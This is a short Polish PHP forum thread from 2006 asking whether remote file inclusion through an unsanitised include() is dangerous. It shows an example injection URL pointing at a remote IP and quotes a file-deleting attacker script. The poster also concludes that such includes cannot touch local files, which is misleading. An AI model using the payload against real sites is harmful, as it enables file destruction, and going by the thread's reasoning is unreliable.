Zagrożenie przy Includowanie pliku z innegoServera Opcje

[maverickkk]

Hi.

W manualu php jest napisane o include:

"(..)Ściśle mówiąc, nie jest to to samo, co wczytywanie pliku lokalnego; jest to wykonanie pliku na zdalnym serwerze i wklejenie rezultatu jego działania do skryptu wywołującego. W tym przypadku, rzecz jasna, zasięg globalny zmiennych nie obejmuje pliku wczytywanego tą metodą."

Czyli defakto nie jest możliwy atak na niezabezpieczony include podająć adres URL do pliku .php na innym serverze (IMG:http://forum.php.pl/style_emoticons/default/questionmark.gif) przykładowo gdzie include($tytul) :

http://xxxxx.pl/?tytul=http://123.123.123.123/index.php

Pozdro.

[maverickkk]

LBO -> Przeglądałem podany temat ale teraz zrobie to dogłebnie jeśli mam znaleść tam rozwiązanie...

Ale już pierwsze słowa się nie zgadzają z manualem bo jest pisane w poście

"(..)Taki skrypt dokonałby dołączenia pliku katalog.php do skryptu lecz co by się stało gdyby włamywacz wpisał taki adres:
http://www.jakas-strona.pl/index.php?plik=...t-niszczacy.php

Dajmy na to że skrypt znajdujący się na serwerze hakera wygląda tak:

<?php
$katalog = opendir('./'); /* skrypt otwiera katalog w którym się znajduje (zostaje wywołany */
while ($plik = readdir($katalog)) {
unlink($file);
} ?>

No i jeżeli pliki w katalogu mają uprawnienia pozwalające na usunięcie ich przez skrypt to możemy się pożegnać z plikami w katalogu.(..) "

A manual mówi "

(..) jest to wykonanie pliku na zdalnym serwerze i wklejenie rezultatu jego działania do skryptu wywołującego(..)"

Czyli jedyne co hacker może skasować takim skryptem to katalogi na własnym serverze ? Czyli dalsze sposoby są bezurzyteczne na zablokowanie includowania przez URL. Bo taki gość sobie zainkluduje plik, strona zmienic wygląd ale w żaden sposób nie zmienic zawartośći plików na naszym serverze ?

Ten post edytował maverickkk 17.04.2006, 10:22:18